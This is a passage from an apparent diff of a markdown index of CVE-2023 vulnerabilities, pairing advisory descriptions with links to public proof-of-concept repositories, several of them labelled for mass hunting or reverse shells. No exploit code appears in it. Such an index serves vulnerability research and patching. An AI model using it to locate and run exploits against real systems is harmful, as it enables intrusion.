[churamanib/CVE-2023-36664-Ghostscript-command-injection](https://github.com/churamanib/CVE-2023-36664-Ghostscript-command-injection) + +### CVE-2023-36723 (2023-10-10) + +Windows Container Manager Service Elevation of Privilege Vulnerability + + +- [Wh04m1001/CVE-2023-36723](https://github.com/Wh04m1001/CVE-2023-36723) + +### CVE-2023-36745 (2023-09-12) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [N1k0la-T/CVE-2023-36745](https://github.com/N1k0la-T/CVE-2023-36745) + +### CVE-2023-36802 (2023-09-12) + +Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability + + +- [chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802](https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802) +- [4zur-0312/CVE-2023-36802](https://github.com/4zur-0312/CVE-2023-36802) +- [x0rb3l/CVE-2023-36802-MSKSSRV-LPE](https://github.com/x0rb3l/CVE-2023-36802-MSKSSRV-LPE) +- [Nero22k/cve-2023-36802](https://github.com/Nero22k/cve-2023-36802) +- [ISH2YU/CVE-2023-36802](https://github.com/ISH2YU/CVE-2023-36802) + +### CVE-2023-36812 (2023-06-30) + +OpenTSDB is a open source, distributed, scalable Time Series Database (TSDB). OpenTSDB is vulnerable to Remote Code Execution vulnerability by writing user-controlled input to Gnuplot configuration file and running Gnuplot with the generated configuration. This issue has been patched in commit `07c4641471c` and further refined in commit `fa88d3e4b`. These patches are available in the `2.4.2` release. Users are advised to upgrade. User unable to upgrade may disable Gunuplot via the config option`tsd.core.enable_ui = true` and remove the shell files `mygnuplot.bat` and `mygnuplot.sh`. + + +- [ErikWynter/opentsdb_key_cmd_injection](https://github.com/ErikWynter/opentsdb_key_cmd_injection) + +### CVE-2023-36844 (2023-08-17) + +A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environment variables.\n\nUsing a crafted request an attacker is able to modify \n\ncertain PHP environment variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\nThis issue affects Juniper Networks Junos OS on EX Series:\n\n\n\n * All versions prior to 20.4R3-S9;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S7;\n * 21.3 versions \n\nprior to \n\n 21.3R3-S5;\n * 21.4 versions \n\nprior to \n\n21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S4;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to 22.3R3-S1;\n * 22.4 versions \n\nprior to \n\n22.4R2-S2, 22.4R3;\n * 23.2 versions prior to \n\n23.2R1-S1, 23.2R2.\n\n\n\n\n + + +- [watchtowrlabs/juniper-rce_cve-2023-36844](https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844) +- [ThatNotEasy/CVE-2023-36844](https://github.com/ThatNotEasy/CVE-2023-36844) +- [r3dcl1ff/CVE-2023-36844_Juniper_RCE](https://github.com/r3dcl1ff/CVE-2023-36844_Juniper_RCE) + +### CVE-2023-36845 (2023-08-17) + +A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series \n\nand SRX Series \n\nallows an unauthenticated, network-based attacker to remotely execute code.\n\nUsing a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code.\n\n\nThis issue affects Juniper Networks Junos OS on EX Series\n\n\nand \n\n\nSRX Series:\n\n\n\n * All versions prior to \n\n20.4R3-S9;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S7;\n * 21.3 versions prior to 21.3R3-S5;\n * 21.4 versions prior to 21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S4;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to \n\n22.3R2-S2, 22.3R3-S1;\n * 22.4 versions \n\nprior to \n\n22.4R2-S1, 22.4R3;\n * 23.2 versions prior to 23.2R1-S1, 23.2R2.\n\n\n\n\n + + +- [vulncheck-oss/cve-2023-36845-scanner](https://github.com/vulncheck-oss/cve-2023-36845-scanner) +- [kljunowsky/CVE-2023-36845](https://github.com/kljunowsky/CVE-2023-36845) +- [toanln-cov/CVE-2023-36845](https://github.com/toanln-cov/CVE-2023-36845) +- [halencarjunior/CVE-2023-36845](https://github.com/halencarjunior/CVE-2023-36845) +- [zaenhaxor/CVE-2023-36845](https://github.com/zaenhaxor/CVE-2023-36845) +- [simrotion13/CVE-2023-36845](https://github.com/simrotion13/CVE-2023-36845) +- [cyberh3als/CVE-2023-36845-POC](https://github.com/cyberh3als/CVE-2023-36845-POC) +- [3yujw7njai/ansible-cve-2023-36845](https://github.com/3yujw7njai/ansible-cve-2023-36845) +- [Asbawy/Automation-for-Juniper-cve-2023-36845](https://github.com/Asbawy/Automation-for-Juniper-cve-2023-36845) +- [jahithoque/Juniper-CVE-2023-36845-Mass-Hunting](https://github.com/jahithoque/Juniper-CVE-2023-36845-Mass-Hunting) +- [cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845](https://github.com/cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845) +- [CharonDefalt/Juniper-exploit-CVE-2023-36845](https://github.com/CharonDefalt/Juniper-exploit-CVE-2023-36845) +- [iveresk/CVE-2023-36845-6-](https://github.com/iveresk/CVE-2023-36845-6-) +- [ak1t4/CVE-2023-36845](https://github.com/ak1t4/CVE-2023-36845) +- [0xNehru/CVE-2023-36845-Juniper-Vulnerability](https://github.com/0xNehru/CVE-2023-36845-Juniper-Vulnerability) +- [ifconfig-me/CVE-2023-36845](https://github.com/ifconfig-me/CVE-2023-36845) +- [e11i0t4lders0n/CVE-2023-36845](https://github.com/e11i0t4lders0n/CVE-2023-36845) +- [Vignesh2712/Automation-for-Juniper-cve-2023-36845](https://github.com/Vignesh2712/Automation-for-Juniper-cve-2023-36845) +- [functionofpwnosec/CVE-2023-36845](https://github.com/functionofpwnosec/CVE-2023-36845) + +### CVE-2023-36846 (2023-08-17) + +A Missing Authentication for Critical Function vulnerability in Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity.\n\n\n\nWith a specific request to user.php that doesn't require authentication an attacker is able to upload arbitrary files via J-Web, leading to a loss of \n\nintegrity\n\nfor a certain \n\npart of the file system, which may allow chaining to other vulnerabilities.\n\n\nThis issue affects Juniper Networks Junos OS on SRX Series:\n\n\n\n * All versions prior to 20.4R3-S8;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S6;\n * 21.3 versions \n\nprior to \n\n 21.3R3-S5;\n * 21.4 versions \n\nprior to \n\n21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S3;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to \n\n22.3R2-S2, 22.3R3;\n * 22.4 versions \n\nprior to \n\n22.4R2-S1, 22.4R3.\n\n\n\n\n + + +- [Chocapikk/CVE-2023-36846](https://github.com/Chocapikk/CVE-2023-36846) + +### CVE-2023-36874 (2023-07-11) + +Windows Error Reporting Service Elevation of Privilege Vulnerability + + +- [d0rb/CVE-2023-36874](https://github.com/d0rb/CVE-2023-36874) +- [crisprss/CVE-2023-36874](https://github.com/crisprss/CVE-2023-36874) +- [Wh04m1001/CVE-2023-36874](https://github.com/Wh04m1001/CVE-2023-36874) +- [Octoberfest7/CVE-2023-36874_BOF](https://github.com/Octoberfest7/CVE-2023-36874_BOF) + +### CVE-2023-36884 (2023-07-11) + +Windows Search Remote Code Execution Vulnerability + + +- [Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline](https://github.com/Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline) +- [deepinstinct/Storm0978-RomCom-Campaign](https://github.com/deepinstinct/Storm0978-RomCom-Campaign) +- [zerosorai/CVE-2023-36884](https://github.com/zerosorai/CVE-2023-36884) +- [tarraschk/CVE-2023-36884-Checker](https://github.com/tarraschk/CVE-2023-36884-Checker) +- [or2me/CVE-2023-36884_patcher](https://github.com/or2me/CVE-2023-36884_patcher) +- [ToddMaxey/CVE-2023-36884](https://github.com/ToddMaxey/CVE-2023-36884) +- [ridsoliveira/Fix-CVE-2023-36884](https://github.com/ridsoliveira/Fix-CVE-2023-36884) +- [raresteak/CVE-2023-36884](https://github.com/raresteak/CVE-2023-36884) +- [jakabakos/CVE-2023-36884-MS-Office-HTML-RCE](https://github.com/jakabakos/CVE-2023-36884-MS-Office-HTML-RCE) + +### CVE-2023-36899 (2023-08-08) + +ASP.NET Elevation of Privilege Vulnerability + + +- [d0rb/CVE-2023-36899](https://github.com/d0rb/CVE-2023-36899) +- [midisec/CVE-2023-36899](https://github.com/midisec/CVE-2023-36899) + +### CVE-2023-36900 (2023-08-08) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [RomanRybachek/CVE-2023-36900](https://github.com/RomanRybachek/CVE-2023-36900) + +### CVE-2023-37073 +- [Hamza0X/CVE-2023-37073](https://github.com/Hamza0X/CVE-2023-37073) + +### CVE-2023-37164 (2023-07-20) + +Diafan CMS v6.0 was discovered to contain a reflected cross-site scripting via the cat_id parameter at /shop/?module=shop&action=search. + + +- [ilqarli27/CVE-2023-37164](https://github.com/ilqarli27/CVE-2023-37164) + +### CVE-2023-37189 (2023-07-11) + +A stored cross site scripting (XSS) vulnerability in index.php?menu=billing_rates of Issabel PBX version 4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the Name or Prefix fields under the Create New Rate module. + + +- [sahiloj/CVE-2023-37189](https://github.com/sahiloj/CVE-2023-37189) + +### CVE-2023-37190 (2023-07-11) + +A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Virtual Fax Name and Caller ID Name parameters under the New Virtual Fax feature. + + +- [sahiloj/CVE-2023-37190](https://github.com/sahiloj/CVE-2023-37190) + +### CVE-2023-37191 (2023-07-11) + +A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Group and Description parameters. + + +- [sahiloj/CVE-2023-37191](https://github.com/sahiloj/CVE-2023-37191) + +### CVE-2023-37250 (2023-08-20) + +Unity Parsec has a TOCTOU race condition that permits local attackers to escalate privileges to SYSTEM if Parsec was installed in "Per User" mode. The application intentionally launches DLLs from a user-owned directory but intended to always perform integrity verification of those DLLs. This affects Parsec Loader versions through 8. Parsec Loader 9 is a fixed version. + + +- [ewilded/CVE-2023-37250-POC](https://github.com/ewilded/CVE-2023-37250-POC) + +### CVE-2023-37474 (2023-07-14) + +Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [ilqarli27/CVE-2023-37474](https://github.com/ilqarli27/CVE-2023-37474) + +### CVE-2023-37478 (2023-08-01) + +pnpm is a package manager. It is possible to construct a tarball that, when installed via npm or parsed by the registry is safe, but when installed via pnpm is malicious, due to how pnpm parses tar archives. This can result in a package that appears safe on the npm registry or when installed via npm being replaced with a compromised or malicious version when installed via pnpm. This issue has been patched in version(s) 7.33.4 and 8.6.8. + + +- [TrevorGKann/CVE-2023-37478_npm_vs_pnpm](https://github.com/TrevorGKann/CVE-2023-37478_npm_vs_pnpm) +- [li-minhao/CVE-2023-37478-Demo](https://github.com/li-minhao/CVE-2023-37478-Demo) + +### CVE-2023-37582 (2023-07-12) + +The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. \n\nWhen NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. \n\nIt is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.\n + + +- [Malayke/CVE-2023-37582_EXPLOIT](https://github.com/Malayke/CVE-2023-37582_EXPLOIT) + +### CVE-2023-37596 (2023-07-11) + +Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via a crafted script to the deleteuser function. + + +- [sahiloj/CVE-2023-37596](https://github.com/sahiloj/CVE-2023-37596) + +### CVE-2023-37597 (2023-07-11) + +Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete user grouplist function. + + +- [sahiloj/CVE-2023-37597](https://github.com/sahiloj/CVE-2023-37597) + +### CVE-2023-37598 (2023-07-13) + +A Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete new virtual fax function. + + +- [sahiloj/CVE-2023-37598](https://github.com/sahiloj/CVE-2023-37598) + +### CVE-2023-37599 (2023-07-13) + +An issue in issabel-pbx v.4.0.0-6 allows a remote attacker to obtain sensitive information via the modules directory + + +- [sahiloj/CVE-2023-37599](https://github.com/sahiloj/CVE-2023-37599) + +### CVE-2023-37621 +- [MY0723/CNVD-2022-27366__CVE-2023-37621](https://github.com/MY0723/CNVD-2022-27366__CVE-2023-37621) + +### CVE-2023-37625 (2023-08-10) + +A stored cross-site scripting (XSS) vulnerability in Netbox v3.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Custom Link templates. + + +- [benjaminpsinclair/Netbox-CVE-2023-37625](https://github.com/benjaminpsinclair/Netbox-CVE-2023-37625) + +### CVE-2023-37739 (2023-09-14) + +i-doit Pro v25 and below was discovered to be vulnerable to path traversal. + + +- [leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below) + +### CVE-2023-37755 (2023-09-14) + +i-doit pro 25 and below and I-doit open 25 and below are configured with insecure default administrator credentials, and there is no warning or prompt to ask users to change the default password and account name. Unauthenticated attackers can exploit this vulnerability to obtain Administrator privileges, resulting in them being able to perform arbitrary system operations or cause a Denial of Service (DoS). + + +- [leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below) + +### CVE-2023-37756 (2023-09-14) + +I-doit pro 25 and below and I-doit open 25 and below employ weak password requirements for Administrator account creation. Attackers are able to easily guess users' passwords via a bruteforce attack. + + +- [leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below) + +### CVE-2023-37771 (2023-07-31) + +Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php. + + +- [anky-123/CVE-2023-37771](https://github.com/anky-123/CVE-2023-37771) + +### CVE-2023-37772 (2023-08-01) + +Online Shopping Portal Project v3.1 was discovered to contain a SQL injection vulnerability via the Email parameter at /shopping/login.php. + + +- [anky-123/CVE-2023-37772](https://github.com/anky-123/CVE-2023-37772) + +### CVE-2023-37778 +- [jyoti818680/CVE-2023-37778](https://github.com/jyoti818680/CVE-2023-37778) + +### CVE-2023-37779 +- [jyoti818680/CVE-2023-37779](https://github.com/jyoti818680/CVE-2023-37779) + +### CVE-2023-37786 (2023-07-13) + +Multiple cross-site scripting (XSS) vulnerabilities in Geeklog v2.2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Mail Settings[backend], Mail Settings[host], Mail Settings[port] and Mail Settings[auth] parameters of the /admin/configuration.php. + + +- [Phamchie/CVE-2023-37786](https://github.com/Phamchie/CVE-2023-37786) + +### CVE-2023-37790 (2023-11-08) + +Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function. + + +- [kaizensecurity/CVE-2023-37790](https://github.com/kaizensecurity/CVE-2023-37790) + +### CVE-2023-37800 +- [TraiLeR2/CVE-2023-37800](https://github.com/TraiLeR2/CVE-2023-37800) + +### CVE-2023-37903 (2023-07-21) + +vm2 is an open source vm/sandbox for Node.js. In vm2 for versions up to and including 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code. This may result in Remote Code Execution, assuming the attacker has arbitrary code execution primitive inside the context of vm2 sandbox. There are no patches and no known workarounds. Users are advised to find an alternative software. + + +- [7h3h4ckv157/CVE-2023-37903](https://github.com/7h3h4ckv157/CVE-2023-37903) + +### CVE-2023-37941 (2023-09-06) + +If an attacker gains write access to the Apache Superset metadata database, they could persist a specifically crafted Python object that may lead to remote code execution on Superset's web backend.\n\nThe Superset metadata db is an 'internal' component that is typically \nonly accessible directly by the system administrator and the superset \nprocess itself. Gaining access to that database should\n be difficult and require significant privileges.\n\nThis vulnerability impacts Apache Superset versions 1.5.0 up to and including 2.1.0. Users are recommended to upgrade to version 2.1.1 or later.\n\n + + +- [Barroqueiro/CVE-2023-37941](https://github.com/Barroqueiro/CVE-2023-37941) + +### CVE-2023-37979 (2023-07-27) + +Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Saturday Drive Ninja Forms Contact Form plugin <= 3.6.25 versions. + + +- [Mehran-Seifalinia/CVE-2023-37979](https://github.com/Mehran-Seifalinia/CVE-2023-37979) +- [d0rb/CVE-2023-37979](https://github.com/d0rb/CVE-2023-37979) + +### CVE-2023-38035 (2023-08-21) + +A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration. + + +- [horizon3ai/CVE-2023-38035](https://github.com/horizon3ai/CVE-2023-38035) +- [LeakIX/sentryexploit](https://github.com/LeakIX/sentryexploit) +- [mind2hex/CVE-2023-38035](https://github.com/mind2hex/CVE-2023-38035) + +### CVE-2023-38039 (2023-09-15) + +When curl retrieves an HTTP response, it stores the incoming headers so that\nthey can be accessed later via the libcurl headers API.\n\nHowever, curl did not have a limit in how many or how large headers it would\naccept in a response, allowing a malicious server to stream an endless series\nof headers and eventually cause curl to run out of heap memory. + + +- [Smartkeyss/CVE-2023-38039](https://github.com/Smartkeyss/CVE-2023-38039) + +### CVE-2023-38041 (2023-10-25) + +A logged in user may elevate its permissions by abusing a Time-of-Check to Time-of-Use (TOCTOU) race condition. When a particular process flow is initiated, an attacker can exploit this condition to gain unauthorized elevated privileges on the affected system. + + +- [ewilded/CVE-2023-38041-POC](https://github.com/ewilded/CVE-2023-38041-POC) + +### CVE-2023-38120 (2024-05-03) + +Adtran SR400ac ping Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adtran SR400ac routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the ping command, which is available over JSON-RPC. A crafted host parameter can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of root.\n. Was ZDI-CAN-20525. + + +- [warber0x/CVE-2023-38120](https://github.com/warber0x/CVE-2023-38120) + +### CVE-2023-38146 (2023-09-12) + +Windows Themes Remote Code Execution Vulnerability + + +- [exploits-forsale/themebleed](https://github.com/exploits-forsale/themebleed) +- [Jnnshschl/CVE-2023-38146](https://github.com/Jnnshschl/CVE-2023-38146) +- [Durge5/ThemeBleedPy](https://github.com/Durge5/ThemeBleedPy) + +### CVE-2023-38408 (2023-07-20) + +The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system. (Code in /usr/lib is not necessarily safe for loading into ssh-agent.) NOTE: this issue exists because of an incomplete fix for CVE-2016-10009. + + +- [kali-mx/CVE-2023-38408](https://github.com/kali-mx/CVE-2023-38408) +- [LucasPDiniz/CVE-2023-38408](https://github.com/LucasPDiniz/CVE-2023-38408) +- [classic130/CVE-2023-38408](https://github.com/classic130/CVE-2023-38408) +- [wxrdnx/CVE-2023-38408](https://github.com/wxrdnx/CVE-2023-38408) +- [mrtacojr/CVE-2023-38408](https://github.com/mrtacojr/CVE-2023-38408) +- [fazilbaig1/cve_2023_38408_scanner](https://github.com/fazilbaig1/cve_2023_38408_scanner) + +### CVE-2023-38434 (2023-07-18) + +xHTTP 72f812d has a double free in close_connection in xhttp.c via a malformed HTTP request method. + + +- [Halcy0nic/CVE-2023-38434](https://github.com/Halcy0nic/CVE-2023-38434) + +### CVE-2023-38490 (2023-07-27) + +Kirby is a content management system. A vulnerability in versions prior to 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6 only affects Kirby sites that use the `Xml` data handler (e.g. `Data::decode($string, 'xml')`) or the `Xml::parse()` method in site or plugin code. The Kirby core does not use any of the affected methods.\n\nXML External Entities (XXE) is a little used feature in the XML markup language that allows to include data from external files in an XML structure. If the name of the external file can be controlled by an attacker, this becomes a vulnerability that can be abused for various system impacts like the disclosure of internal or confidential data that is stored on the server (arbitrary file disclosure) or to perform network requests on behalf of the server (server-side request forgery, SSRF).\n\nKirby's `Xml::parse()` method used PHP's `LIBXML_NOENT` constant, which enabled the processing of XML external entities during the parsing operation. The `Xml::parse()` method is used in the `Xml` data handler (e.g. `Data::decode($string, 'xml')`). Both the vulnerable method and the data handler are not used in the Kirby core. However they may be used in site or plugin code, e.g. to parse RSS feeds or other XML files. If those files are of an external origin (e.g. uploaded by a user or retrieved from an external URL), attackers may be able to include an external entity in the XML file that will then be processed in the parsing process. Kirby sites that don't use XML parsing in site or plugin code are *not* affected.\n\nThe problem has been patched in Kirby 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6. In all of the mentioned releases, the maintainers have removed the `LIBXML_NOENT` constant as processing of external entities is out of scope of the parsing logic. This protects all uses of the method against the described vulnerability. + + +- [Acceis/exploit-CVE-2023-38490](https://github.com/Acceis/exploit-CVE-2023-38490) + +### CVE-2023-38497 (2023-08-04) + +Cargo downloads the Rust project’s dependencies and compiles the project. Cargo prior to version 0.72.2, bundled with Rust prior to version 1.71.1, did not respect the umask when extracting crate archives on UNIX-like systems. If the user downloaded a crate containing files writeable by any local user, another local user could exploit this to change the source code compiled and executed by the current user. To prevent existing cached extractions from being exploitable, the Cargo binary version 0.72.2 included in Rust 1.71.1 or later will purge caches generated by older Cargo versions automatically. As a workaround, configure one's system to prevent other local users from accessing the Cargo directory, usually located in `~/.cargo`. + + +- [lucas-cauhe/cargo-perm](https://github.com/lucas-cauhe/cargo-perm) + +### CVE-2023-38499 (2023-07-25) + +TYPO3 is an open source PHP based web content management system. Starting in version 9.4.0 and prior to versions 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30, and 12.4.4, in multi-site scenarios, enumerating the HTTP query parameters `id` and `L` allowed out-of-scope access to rendered content in the website frontend. For instance, this allowed visitors to access content of an internal site by adding handcrafted query parameters to the URL of a site that was publicly available. TYPO3 versions 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30, 12.4.4 fix the problem. + + +- [miguelc49/CVE-2023-38499-2](https://github.com/miguelc49/CVE-2023-38499-2) +- [miguelc49/CVE-2023-38499-1](https://github.com/miguelc49/CVE-2023-38499-1) +- [miguelc49/CVE-2023-38499-3](https://github.com/miguelc49/CVE-2023-38499-3) + +### CVE-2023-38545 (2023-10-18) + +This flaw makes curl overflow a heap based buffer in the SOCKS5 proxy\nhandshake.\n\nWhen curl is asked to pass along the host name to the SOCKS5 proxy to allow\nthat to resolve the address instead of it getting done by curl itself, the\nmaximum length that host name can be is 255 bytes.\n\nIf the host name is detected to be longer, curl switches to local name\nresolving and instead passes on the resolved address only. Due to this bug,\nthe local variable that means "let the host resolve the name" could get the\nwrong value during a slow SOCKS5 handshake, and contrary to the intention,\ncopy the too long host name to the target buffer instead of copying just the\nresolved address there.\n\nThe target buffer being a heap based buffer, and the host name coming from the\nURL that curl has been told to operate with.\n + + +- [UTsweetyfish/CVE-2023-38545](https://github.com/UTsweetyfish/CVE-2023-38545) +- [imfht/CVE-2023-38545](https://github.com/imfht/CVE-2023-38545) +- [fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow](https://github.com/fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow) +- [vanigori/CVE-2023-38545-sample](https://github.com/vanigori/CVE-2023-38545-sample) +- [dbrugman/CVE-2023-38545-POC](https://github.com/dbrugman/CVE-2023-38545-POC) +- [bcdannyboy/CVE-2023-38545](https://github.com/bcdannyboy/CVE-2023-38545) +- [d0rb/CVE-2023-38545](https://github.com/d0rb/CVE-2023-38545) +- [Yang-Shun-Yu/CVE-2023-38545](https://github.com/Yang-Shun-Yu/CVE-2023-38545) +- [nphuang/NS-Project-2024-Spring](https://github.com/nphuang/NS-Project-2024-Spring) + +### CVE-2023-38571 (2023-07-28) + +This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. An app may be able to bypass Privacy preferences. + + +- [gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV](https://github.com/gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV) + +### CVE-2023-38609 (2023-07-28) + +An injection issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.5. An app may be able to bypass certain Privacy preferences. + + +- [mc-17/CVE-2023-38609](https://github.com/mc-17/CVE-2023-38609) + +### CVE-2023-38632 (2023-07-21) + +async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in tcpsocket.hpp when processing malformed TCP packets. + + +- [Halcy0nic/CVE-2023-38632](https://github.com/Halcy0nic/CVE-2023-38632) + +### CVE-2023-38646 (2023-07-21) + +Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2. + + +- [adriyansyah-mf/CVE-2023-38646--Metabase-](https://github.com/adriyansyah-mf/CVE-2023-38646--Metabase-) +- [Pumpkin-Garden/POC_Metabase_CVE-2023-38646](https://github.com/Pumpkin-Garden/POC_Metabase_CVE-2023-38646) +- [0xrobiul/CVE-2023-38646](https://github.com/0xrobiul/CVE-2023-38646) +- [Chocapikk/CVE-2023-38646](https://github.com/Chocapikk/CVE-2023-38646) +- [Xuxfff/CVE-2023-38646-Poc](https://github.com/Xuxfff/CVE-2023-38646-Poc) +- [securezeron/CVE-2023-38646](https://github.com/securezeron/CVE-2023-38646) +- [raytheon0x21/CVE-2023-38646](https://github.com/raytheon0x21/CVE-2023-38646) +- [Zenmovie/CVE-2023-38646](https://github.com/Zenmovie/CVE-2023-38646) +- [shamo0/CVE-2023-38646-PoC](https://github.com/shamo0/CVE-2023-38646-PoC) +- [fidjiw/CVE-2023-38646-POC](https://github.com/fidjiw/CVE-2023-38646-POC) +- [Any3ite/cve-2023-38646-metabase-ReverseShell](https://github.com/Any3ite/cve-2023-38646-metabase-ReverseShell) +- [robotmikhro/CVE-2023-38646](https://github.com/robotmikhro/CVE-2023-38646) +- [kh4sh3i/CVE-2023-38646](https://github.com/kh4sh3i/CVE-2023-38646) +- [yxl2001/CVE-2023-38646](https://github.com/yxl2001/CVE-2023-38646) +- [alexandre-pecorilla/CVE-2023-38646](https://github.com/alexandre-pecorilla/CVE-2023-38646) +- [m3m0o/metabase-pre-auth-rce-poc](https://github.com/m3m0o/metabase-pre-auth-rce-poc) +- [CN016/Metabase-H2-CVE-2023-38646-](https://github.com/CN016/Metabase-H2-CVE-2023-38646-) +- [Boogipop/MetabaseRceTools](https://github.com/Boogipop/MetabaseRceTools) +- [SUT0L/CVE-2023-38646](https://github.com/SUT0L/CVE-2023-38646) +- [nickswink/CVE-2023-38646](https://github.com/nickswink/CVE-2023-38646) +- [passwa11/CVE-2023-38646](https://github.com/passwa11/CVE-2023-38646) +- [threatHNTR/CVE-2023-38646](https://github.com/threatHNTR/CVE-2023-38646) +- [asepsaepdin/CVE-2023-38646](https://github.com/asepsaepdin/CVE-2023-38646) +- [Pyr0sec/CVE-2023-38646](https://github.com/Pyr0sec/CVE-2023-38646) +- [birdm4nw/CVE-2023-38646](https://github.com/birdm4nw/CVE-2023-38646) +- [AnvithLobo/CVE-2023-38646](https://github.com/AnvithLobo/CVE-2023-38646) +- [Red4mber/CVE-2023-38646](https://github.com/Red4mber/CVE-2023-38646) +- [junnythemarksman/CVE-2023-38646](https://github.com/junnythemarksman/CVE-2023-38646) +- [Mrunalkaran/CVE-2023-38646](https://github.com/Mrunalkaran/CVE-2023-38646) +- [j0yb0y0h/CVE-2023-38646](https://github.com/j0yb0y0h/CVE-2023-38646) +- [Ego1stoo/CVE-2023-38646](https://github.com/Ego1stoo/CVE-2023-38646) +- [0utl4nder/Another-Metabase-RCE-CVE-2023-38646](https://github.com/0utl4nder/Another-Metabase-RCE-CVE-2023-38646) +- [Shisones/MetabaseRCE_CVE-2023-38646](https://github.com/Shisones/MetabaseRCE_CVE-2023-38646) +- [acesoyeo/METABASE-RCE-CVE-2023-38646-](https://github.com/acesoyeo/METABASE-RCE-CVE-2023-38646-) +- [UserConnecting/Exploit-CVE-2023-38646-Metabase](https://github.com/UserConnecting/Exploit-CVE-2023-38646-Metabase) +- 